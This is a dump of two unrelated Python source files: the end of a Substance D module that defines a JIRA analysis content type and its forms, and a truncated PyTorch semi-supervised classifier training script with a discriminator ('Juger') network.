import Schema\n\nfrom substanced.util import renamer\n\nfrom substanced.sdi import mgmt_view\nfrom substanced.form import FormView\nfrom substanced.interfaces import IFolder\n\nfrom ..analysis.cache import AnalysisCache\nfrom ..constants import AnalysisTypes\n\ndef short_name(title):\n \"\"\"Given a title, return a url-friendly name\n \"\"\"\n return urllib.quote(title.strip().lower().replace(u' ', u'-'))\n\n@colander.deferred\ndef name_validator(node, kw):\n \"\"\"Validate that the short name doesn't exist in the parent already.\n \"\"\"\n request = kw['request']\n context = request.context\n\n # Add or edit form?\n if request.registry.content.typeof(context) == 'Analysis':\n parent = context.__parent__\n instance = context\n else:\n parent = context\n instance = None\n\n def namecheck(node, value):\n try:\n new_name = short_name(value)\n\n # Only check if we are creating new content or actually changing the name\n if instance is None or instance.__name__ != new_name:\n parent.check_name(new_name)\n except FolderKeyError:\n raise colander.Invalid(node, \"Another analysis already exists with this name\", value)\n except Exception as e:\n raise colander.Invalid(node, e.args[0], value)\n\n return colander.All(\n colander.Length(1),\n namecheck,\n )\n\nclass AnalysisParameter(colander.Schema):\n key = colander.SchemaNode(colander.String())\n value = colander.SchemaNode(colander.String())\n\nclass AnalysisParameters(colander.SequenceSchema):\n parameter = AnalysisParameter()\n\nclass AnalysisSchema(Schema):\n\n title = colander.SchemaNode(\n colander.String(),\n validator=name_validator\n )\n\n description = colander.SchemaNode(\n colander.String(),\n missing=None,\n widget=deform.widget.TextAreaWidget(rows=5)\n )\n\n type = colander.SchemaNode(\n colander.String(),\n validator=colander.OneOf(AnalysisTypes.values()),\n widget=deform.widget.SelectWidget(values=AnalysisTypes.items())\n )\n\n refresh_interval = colander.SchemaNode(\n colander.Int(),\n description=\"Number of minutes to cache JIRA query results for.\",\n validator=colander.Range(min=0)\n )\n\n query = colander.SchemaNode(\n colander.String(),\n missing=None,\n description=\"JQL query specifying the data to include in the analysis.\"\n )\n\n parameters = AnalysisParameters(\n missing=None,\n description=\"Analysis-specific parameters.\"\n )\n\nclass AnalysisPropertySheet(PropertySheet):\n schema = AnalysisSchema()\n\n@content('Analysis',\n icon='glyphicon glyphicon-list-alt',\n add_view=lambda context, request: 'add_analysis' if request.registry.content.istype(context, 'JIRA Instance') else None,\n propertysheets=(('Basic', AnalysisPropertySheet),),\n after_create='after_create',\n)\nclass Analysis(Persistent):\n \"\"\"An analysis created for a particular JIRA instance\n \"\"\"\n\n name = renamer()\n\n def __init__(self, title='', description='', type='', refresh_interval=0, query='', parameters=None):\n super(Analysis, self).__init__()\n\n if parameters is None:\n parameters = {}\n\n self.title = title\n self.description = description\n self.type = type\n self.refresh_interval = refresh_interval\n self.query = query\n self.parameters = parameters\n\n @property\n def title(self):\n return self._title\n @title.setter\n def title(self, value):\n self._title = value\n\n name = self.analysis_name\n if name:\n self.name = name\n\n @property\n def analysis_name(self):\n return short_name(self.title)\n\n def after_create(self, inst, registry):\n self.cache = AnalysisCache(inst.refresh_interval)\n\n@mgmt_view(\n context=IFolder,\n name='add_analysis',\n tab_title='Add Analysis',\n permission='sdi.add-content',\n renderer='substanced.sdi:templates/form.pt',\n tab_condition=False,\n)\nclass AddAnalysisInstanceView(FormView):\n title = 'Add Analysis'\n schema = AnalysisSchema()\n buttons = ('add',)\n\n def add_success(self, appstruct):\n registry = self.request.registry\n instance = registry.content.create('Analysis', **appstruct)\n self.context[instance.analysis_name] = instance\n\n return HTTPFound(\n self.request.sdiapi.mgmt_path(self.context, '@@contents')\n )\n","sub_path":"jiraflow/resources/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"283277242","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 12:47:58 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 09:35:00 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 11:43:47 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 11:27:42 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 14:52:52 2019\r\n\r\n@author: yorksywang\r\n\"\"\"\r\n\r\nimport sklearn.svm as svm \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom functools import reduce\r\nimport torch.optim as optim\r\nimport torch.nn as nn\r\nfrom torch.nn import utils\r\nfrom torch.nn import init\r\n#from sklearn.datasets.samples_generator import make_blobs\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\n#from model import LinearSVM\r\nimport pandas as pd\r\nUSE_CUDA = torch.cuda.is_available()\r\ndevice = torch.device(\"cuda\" if USE_CUDA else \"cpu\")\r\nimport random\r\nimport torch.nn.functional as F\r\nimport argparse\r\n\r\nglobal_input_size=256\r\n\r\n\r\ndef same_class_augmentation(x_to_aug,y_to_aug):\r\n \"\"\" Perform same class augmentation of the wave by loading a random segment\r\n from the class_dir and additively combine the wave with that segment.\r\n \"\"\"\r\n #sig_paths = glob.glob(os.path.join(class_dir, \"*.wav\"))\r\n #aug_sig_path = np.random.choice(sig_paths, 1, replace=False)[0]\r\n #(fs, aug_sig) = utils.read_wave_file(aug_sig_path)\r\n #print(np.shape(x_to_aug))\r\n output_x=x_to_aug\r\n output_y=np.concatenate((y_to_aug,y_to_aug),axis=0)\r\n for i in range(np.shape(x_to_aug)[0]):\r\n x_temp1 =np.mean(random.choices(x_to_aug,k=5),0)\r\n alpha = np.random.rand()\r\n to_add=(1.0-alpha)*x_to_aug[i,:] + alpha*x_temp1\r\n #print(np.shape(to_add))\r\n output_x=np.concatenate( (output_x,to_add.reshape(1,global_input_size)),axis=0)\r\n #print(np.shape(output_x))\r\n return output_x,output_y\r\n\r\n\r\ndef get_data(test_size=0.2):\r\n #file_name=['word_list_gamble_20190927','training_data_weg','training_data_gam','training_data_bag']\r\n # i=0\r\n #df_train=pd.read_csv('./data/'+file_name[i]+'.csv',encoding='utf-8',header=1)\r\n df_train=pd.read_csv('../nlp/training_data_20191119.csv',encoding='utf-8',header=0,index_col=0)\r\n df_word=pd.read_csv('../nlp/training_data_20191119_word2vec_dict.csv',encoding='utf-8',header=0,index_col=0)\r\n \r\n x_train=np.array(df_train.values[:,0:global_input_size]).astype('float64') \r\n y_train=np.array(df_train.values[:,global_input_size]).astype('int')\r\n z_train=np.array(df_word.values[:]).astype('str')\r\n\r\n y=y_train[np.where(y_train>=0)]\r\n x=x_train[np.where(y_train>=0)]\r\n #X_train,X_test,Y_train,Y_test=train_test_split(x,y,test_size=0.15,random_state=20170816)\r\n\r\n y_temp=y_train[np.where(y_train>=1)]\r\n x_temp=x_train[np.where(y_train>=1)]\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n \r\n #x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n print(x_temp.shape)\r\n y=np.concatenate((y,y_temp),axis=0)\r\n x=np.concatenate((x,x_temp),axis=0)\r\n y_temp=y_train[np.where(y_train==0)]\r\n x_temp=x_train[np.where(y_train==0)]\r\n print(x_temp.shape)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n \r\n print(x_temp.shape)\r\n y=np.concatenate((y,y_temp),axis=0)\r\n x=np.concatenate((x,x_temp),axis=0)\r\n# =============================================================================\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# =============================================================================\r\n ran_index=np.random.permutation(np.shape(y)[0])\r\n \r\n y=y[ran_index]\r\n x=x[ran_index]\r\n \r\n X_train,X_test,Y_train,Y_test=train_test_split(x,y,test_size=test_size,random_state=20170816)\r\n #print(X_train.shape)\r\n\r\n# =============================================================================\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# =============================================================================\r\n \r\n sc=StandardScaler()\r\n \r\n sc.fit(X_train)\r\n \r\n X_train_nor=sc.transform(X_train)\r\n X_test_nor=sc.transform(X_test)\r\n \r\n z_train=z_train[np.where(y_train<0)]\r\n x_grey=x_train[np.where(y_train<0)]\r\n X_grey_nor=sc.transform(x_grey)\r\n return X_train_nor, Y_train,X_test_nor,Y_test,X_grey_nor,z_train\r\n\r\nclass Classfier(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #print(x.shape)\r\n x = self.layer3(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n# =============================================================================\r\n# class Classfier(torch.nn.Module):\r\n# def __init__(self):\r\n# super(Classfier, self).__init__()\r\n# self.layer1 = torch.nn.Linear(128,32)\r\n# self.layer2 = torch.nn.Linear(32,1)\r\n# #self.model.to(device)\r\n# #self.epoches = epoches\r\n# \r\n# def forward(self, x):\r\n# #x = self.drop_out1(x)\r\n# x = F.relu(self.layer1(x))\r\n# x = self.layer2(x)\r\n# # print(x.shape)\r\n# \r\n# \r\n# return x\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# class Classfier(torch.nn.Module):\r\n# def __init__(self,args):\r\n# super(Classfier, self).__init__()\r\n# self.layer1 = torch.nn.Linear(args.input_size,64)\r\n# self.layer2 = torch.nn.Linear(64,32)\r\n# self.layer3 = torch.nn.Linear(32,args.output_size)\r\n# torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n# torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n# torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n# #self.model.to(device)\r\n# #self.epoches = epoches\r\n# \r\n# def forward(self, x):\r\n# #x = self.drop_out1(x)\r\n# x = F.relu(self.layer1(x))\r\n# x = F.relu(self.layer2(x))\r\n# x = self.layer3(x)\r\n# # print(x.shape)\r\n# \r\n# \r\n# return x\r\n# =============================================================================\r\n\r\n\r\nclass Classfier_2layer(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier_2layer, self).__init__()\r\n self.layer1 = torch.nn.Linear(args.input_size,32)\r\n #self.layer2 = torch.nn.Linear(32,16)\r\n self.layer3 = torch.nn.Linear(32,args.output_size)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n x = F.relu(self.layer1(x))\r\n #x = F.relu(self.layer2(x))\r\n x = self.layer3(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n\r\nclass Classfier_1layer(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier_1layer, self).__init__()\r\n self.layer1 = torch.nn.Linear(args.input_size,1)\r\n #self.layer2 = torch.nn.Linear(32,16)\r\n #self.layer3 = torch.nn.Linear(32,args.output_size)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n #x = F.relu(self.layer1(x))\r\n #x = F.relu(self.layer2(x))\r\n x = self.layer1(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n\r\n\r\nclass Juger(torch.nn.Module):\r\n def __init__(self):\r\n super(Juger, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n self.layer4=torch.nn.Linear(2,1)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n torch.nn.init.xavier_uniform_(self.layer4.weight)\r\n \r\n def forward(self, x,y=None):\r\n #x = self.drop_out1(x)\r\n #print(x.shape)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #print(x.shape)\r\n \r\n x = self.layer3(x)\r\n #print(x.shape)\r\n #output=x\r\n if y is not None:\r\n #print(x.shape)\r\n #print(y.shape)\r\n #print(torch.cat((x,y),dim=1).shape)\r\n x=self.layer4(torch.cat((x,y),dim=1))\r\n\r\n return x\r\n\r\n\r\nclass JugerProject(torch.nn.Module):\r\n def __init__(self):\r\n super(JugerProject, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n #self.dropout=torch.nn.Dropout(0.5)\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n self.layer4=torch.nn.Linear(1, (global_input_size-4)*5)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n torch.nn.init.xavier_uniform_(self.layer4.weight)\r\n \r\n def forward(self, x,y=None):\r\n #x = self.drop_out1(x)\r\n #print(x.shape)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #x= self.dropout(x)\r\n #print(x.shape)\r\n output = self.layer3(x)\r\n #print(x.shape)\r\n #output=x\r\n if y is not None:\r\n #print(x.shape)\r\n #print(y.shape)\r\n #print(torch.cat((x,y),dim=1).shape)\r\n ly=self.layer4(y)\r\n #print(ly.shape)\r\n #print(output.shape)\r\n #print(x.shape)\r\n output+=torch.sum(ly*x, dim=1, keepdim=True) \r\n #print(output.shape)\r\n #print(output)\r\n return output\r\n\r\n\r\nclass Model:\r\n def __init__(self,args):\r\n if args.num_of_layer==1:\r\n self.model1 = Classfier_1layer(args)\r\n elif args.num_of_layer==2:\r\n self.model1 = Classfier_2layer(args)\r\n else:\r\n self.model1 = Classfier(args)\r\n self.model1.to(device)\r\n if args.juger_type==1:\r\n self.model2 = Juger()\r\n else:\r\n self.model2 = JugerProject()\r\n self.model2.to(device)\r\n self.epoches = args.epoch\r\n\r\n \r\n def train(self, train_set, unlab_set, elv, args, pretrain=False):\r\n #loss_func = nn.BCEWithLogitsLoss() #nn.CrossEntropyLoss()\r\n loss_func =nn.MSELoss(reduce=False)\r\n #loss_func =nn.MSELoss(reduce=False, size_average=False)\r\n #optimizer = torch.optim.RMSprop(self.model1.parameters(),lr=0.0003)\r\n #optimizer = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.01)\r\n optimizer = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n optimizer_policy_gradient = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n #scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,T_max = (100 // 9) + 1)\r\n scheduler =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=args.patience, verbose=False, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n scheduler_policy_gradient =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_policy_gradient, mode='min', factor=0.1, patience=args.patience, verbose=False, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n #scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\r\n #optimizer = optim.SGD(self.model1.parameters(), lr=0.001)\r\n if pretrain==True:\r\n checkpoint = torch.load('./model.pth.tar')\r\n for name in checkpoint ['model'].keys():\r\n print(name)\r\n # here, checkpoint is a dict with the keys you defined before\r\n self.model1.load_state_dict(checkpoint['model'])\r\n optimizer.load_state_dict(checkpoint['opt'])\r\n\r\n loss_func_judge = nn.BCEWithLogitsLoss()#nn.MSELoss(reduce=True, size_average=True)#nn.BCELoss()#nn.MSELoss(reduce=True, size_average=True)#nn.CrossEntropyLoss()\r\n #optimizer = torch.optim.RMSprop(self.model.parameters(),lr=0.0003)\r\n optimizer_judge = torch.optim.Adam(self.model2.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n scheduler_judge =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_judge, mode='min', factor=0.1, patience=args.patience, verbose=True, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n for epoch in range(self.epoches):\r\n total_loss = 0\r\n total_loss1 = 0\r\n reward=0\r\n # total_loss2 = 0\r\n if epoch<50:\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n# =============================================================================\r\n# train_temp = random.choices(train_set,k=5)\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# #print(len(train_temp))\r\n# #print(len(train_temp[0]))\r\n# train_temp=np.array(train_temp)\r\n# features = torch.tensor(train_temp[:,:-1], dtype=torch.float, device=device)\r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label = torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n# optimizer.zero_grad()\r\n# \r\n# pred = self.model1(features) # [batch, out_dim]\r\n# #print(pred.shape)\r\n# #print(label.shape)\r\n# loss = loss_func(pred, label)\r\n# loss.backward()\r\n# total_loss += loss\r\n# optimizer.step()\r\n# =============================================================================\r\n train_temp = random.choices(train_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp[:,:-1], dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer.zero_grad()\r\n \r\n pred = self.model1(features) # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(label.shape)\r\n loss = loss_func(pred, label)\r\n loss.mean().backward()\r\n total_loss += loss.mean().item()\r\n optimizer.step()\r\n scheduler.step(total_loss/1000) \r\n if epoch%10==0:\r\n print(\"Classfier: in epoch {} loss {}\".format(epoch, total_loss/2000))\r\n #print(\"Current Learning Rate is {}!\".format(optimizer.param_groups[0]['lr']))\r\n else:\r\n if epoch==30:\r\n torch.save(self.model1.state_dict(),\"model.pth\") # 保存参数\r\n #model = model() # 代码中创建网络结构\r\n params = torch.load(\"model.pth\") # 加载参数\r\n params['layer4.weight']=self.model2.layer4.weight\r\n params['layer4.bias']=self.model2.layer4.bias\r\n self.model2.load_state_dict(params) # 应用到网络结构中\r\n if epoch<120:\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n if random.random()<=0.5:\r\n train_temp = random.choices(train_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(np.ones((20)), dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer_judge.zero_grad()\r\n #pred = self.model2(features)\r\n #print(features.dtype)\r\n if args.juger_type==1: \r\n _y=torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n else:\r\n _y=torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n #print(_y.dtype)\r\n pred = self.model2(features,_y) # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n #print(pred)\r\n #print(label)\r\n loss_judge = loss_func_judge(pred, label)\r\n loss_judge.backward()\r\n total_loss += loss_judge\r\n optimizer_judge.step()\r\n else:\r\n train_temp = random.choices(unlab_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp, \r\n dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(np.zeros((20)), dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer_judge.zero_grad()\r\n \r\n #pred = self.model2(features)\r\n #print(pred.shape)\r\n #print(features.dtype)\r\n if args.juger_type==1: \r\n _y=self.model1(torch.tensor(train_temp, dtype=torch.float, device=device).unsqueeze(1))\r\n else:\r\n _y=self.model1(torch.tensor(train_temp, dtype=torch.float, device=device).unsqueeze(1))\r\n _y=torch.round(torch.sigmoid(_y))\r\n #_y=_y.squeeze(1)\r\n #print(_y.dtype)\r\n #print(_y.dtype)\r\n \r\n pred = self.model2(features,_y) # [batch, out_dim]\r\n #print(pred)\r\n #print(label)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n loss_judge = loss_func_judge(pred, label)\r\n loss_judge.backward()\r\n total_loss += loss_judge\r\n optimizer_judge.step()\r\n scheduler_judge.step(total_loss/1000)\r\n if epoch%10==0: \r\n print(\"Judger: in epoch {} loss {}\".format(epoch, total_loss/2000))\r\n else:\r\n\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n #print(x)\r\n train_temp1 = random.choices(train_set,k=10)\r\n train_temp1=np.array(train_temp1)\r\n# =============================================================================\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# train_temp1=np.array(train_temp1)\r\n# features1 = torch.tensor(train_temp1[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n# \r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label1 = torch.tensor(np.ones((10)), dtype=torch.float, device=device).unsqueeze(1)\r\n# _y1=torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n# #print(_y1.shape)\r\n# #print(_y.dtype)\r\n# pred1 = self.model2(features1,_y1) # [batch, out_dim]\r\n# \r\n# \r\n# =============================================================================\r\n train_temp2 = random.choices(unlab_set,k=10)\r\n train_temp2=np.array(train_temp2)\r\n# =============================================================================\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# features2 = torch.tensor(train_temp2, \r\n# dtype=torch.float, device=device).unsqueeze(1)\r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label2 = torch.tensor(np.zeros((10)), dtype=torch.float, device=device).unsqueeze(1)\r\n# _y2=torch.round(torch.sigmoid(self.model1(features2)))\r\n# #print(_y2.shape)\r\n# pred2 = self.model2(features2,_y2) # [batch, out_dim]\r\n# \r\n# if_label=torch.cat((label1,label2))\r\n# all_judge_prob=torch.cat((pred1,pred2))\r\n# loss_judge=loss_func_judge(all_judge_prob,if_label)\r\n# optimizer_judge.zero_grad()\r\n# loss_judge.backward()\r\n# total_loss1 += loss_judge\r\n# optimizer_judge.step() \r\n# =============================================================================\r\n \r\n \r\n optimizer.zero_grad()\r\n features3 = torch.tensor(train_temp1[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n \r\n #print(features3.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n #label3 = torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n pred3 = torch.sigmoid(self.model1(features3))\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #print(pred3)\r\n # print(label3)\r\n #loss_label = loss_func(pred3, label3)\r\n #print(loss_label)\r\n \r\n #print(pred3.shape)\r\n #print(_y1.shape)\r\n 